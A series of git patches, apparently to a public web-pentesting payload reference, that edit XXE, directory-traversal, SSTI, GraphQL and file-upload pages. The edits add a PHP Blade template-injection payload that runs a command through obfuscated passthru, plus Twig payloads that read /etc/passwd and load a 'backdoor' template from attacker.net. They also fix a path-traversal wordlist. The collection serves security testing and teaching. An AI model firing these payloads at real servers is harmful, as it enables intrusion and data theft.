From aa85b80aced70b16ab8e99fc42cb111ac6681729 Mon Sep 17 00:00:00 2001
From: piranha <96269065+piranhaAD@users.noreply.github.com>
Date: Tue, 9 Sep 2025 19:16:45 +0100
Subject: [PATCH 1/5] correction of xxe ssrf payload
remove the % from the payload as it's not a parametrized entity
---
XXE Injection/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 6c02302290..734588e68d 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
-
+
]>
&xxe;
```
From 9a08798848fc78bc1c6f9c9753f8cd8a1bfb74a6 Mon Sep 17 00:00:00 2001
From: Aaditya <146899562+Aaditya-Chunekar@users.noreply.github.com>
Date: Wed, 22 Oct 2025 19:44:31 +0530
Subject: [PATCH 2/5] hacktoberfest - Update YouTube.md with new resources
Added LaurieWired and Tib3rius YouTube channels.
---
_LEARNING_AND_SOCIALS/YOUTUBE.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md
index c6223bf879..c00951cebd 100644
--- a/_LEARNING_AND_SOCIALS/YOUTUBE.md
+++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md
@@ -19,6 +19,7 @@
- [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider)
- [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
- [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka)
+- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired)
- [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
- [Nahamsec](https://www.youtube.com/c/Nahamsec)
@@ -30,6 +31,7 @@
- [STÖK](https://www.youtube.com/c/STOKfredrik)
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
- [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
+- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius)
- [xct hacks](https://www.youtube.com/@xct_de)
## Conferences
@@ -62,3 +64,4 @@
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
+
From 3359054ecf124357973baf890c9a1991dd3a8baa Mon Sep 17 00:00:00 2001
From: Reelix
Date: Fri, 31 Oct 2025 14:22:13 +0200
Subject: [PATCH 3/5] Fixed missing {FILE} placeholders
The bottom few options were missing the {FILE} placeholders.
This fixes them.
---
.../Intruder/traversals-8-deep-exotic-encoding.txt | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
index 5fbaded549..05ea1a92c5 100644
--- a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
+++ b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
@@ -877,11 +877,11 @@
/..\..\\..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\..\..\\\{FILE}
-/\..%2f
-/\..%2f\..%2f
-/\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
+/\..%2f{FILE}
+/\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
From 832b54fd951536bb329458d52dfaa366988b4f02 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 15 Nov 2025 17:11:42 +0100
Subject: [PATCH 4/5] Syntax Highlighting SSTI
---
GraphQL Injection/README.md | 1 +
Server Side Template Injection/PHP.md | 40 ++++++++++++++++--------
Server Side Template Injection/Python.md | 1 +
Upload Insecure Files/README.md | 1 +
4 files changed, 30 insertions(+), 13 deletions(-)
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 4e69a37baa..0192f55adf 100644
--- a/GraphQL Injection/README.md
+++ b/GraphQL Injection/README.md
@@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
+- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index f8502ad68a..cc3618c315 100644
--- a/Server Side Template Injection/PHP.md
+++ b/Server Side Template Injection/PHP.md
@@ -21,21 +21,34 @@
## Templating Libraries
-| Template Name | Payload Format |
-| -------------- | --------- |
-| Laravel Blade | `{{ }}` |
-| Latte | `{var $X=""}{$X}` |
-| Mustache | `{{ }}` |
-| Plates | `` |
-| Smarty | `{ }` |
-| Twig | `{{ }}` |
+| Template Name | Payload Format |
+| --------------- | --------- |
+| Blade (Laravel) | `{{ }}` |
+| Latte | `{var $X=""}{$X}` |
+| Mustache | `{{ }}` |
+| Plates | `` |
+| Smarty | `{ }` |
+| Twig | `{{ }}` |
+
+## Blade
+
+[Official website](https://laravel.com/docs/master/blade)
+> Blade is the simple, yet powerful templating engine that is included with Laravel.
+
+The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
+
+```php
+{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
+```
+
+---
## Smarty
[Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP.
-```python
+```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}
@@ -52,7 +65,7 @@
### Twig - Basic Injection
-```python
+```php
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
@@ -62,7 +75,7 @@
### Twig - Template Format
-```python
+```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
@@ -76,14 +89,14 @@ $output = $twig > render (
### Twig - Arbitrary File Reading
-```python
+```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
```
### Twig - Code Execution
-```python
+```php
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
@@ -249,4 +262,5 @@ layout template:
## References
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md
index 87137471de..056d605710 100644
--- a/Server Side Template Injection/Python.md
+++ b/Server Side Template Injection/Python.md
@@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
+- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 2047d0c3c6..75f5aa94b2 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
+ * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`
* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
From ca50df233621323dc76273ee94f9e59f176fd6de Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 15 Nov 2025 17:36:38 +0100
Subject: [PATCH 5/5] Fix markdown linting
---
XXE Injection/README.md | 7 +++++++
_LEARNING_AND_SOCIALS/YOUTUBE.md | 1 -
2 files changed, 7 insertions(+), 1 deletion(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 734588e68d..eb642671e9 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
+These are different types of entities in XML:
+
+| Type | Prefix | Where usable |
+| ---------------- | -------- | --------------------------- |
+| General entity | `&name;` | Inside XML document content |
+| Parameter entity | `%name;` | Only inside the DTD |
+
## Exploiting XXE to Retrieve Files
### Classic XXE
diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md
index c00951cebd..7fea856c17 100644
--- a/_LEARNING_AND_SOCIALS/YOUTUBE.md
+++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md
@@ -64,4 +64,3 @@
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
-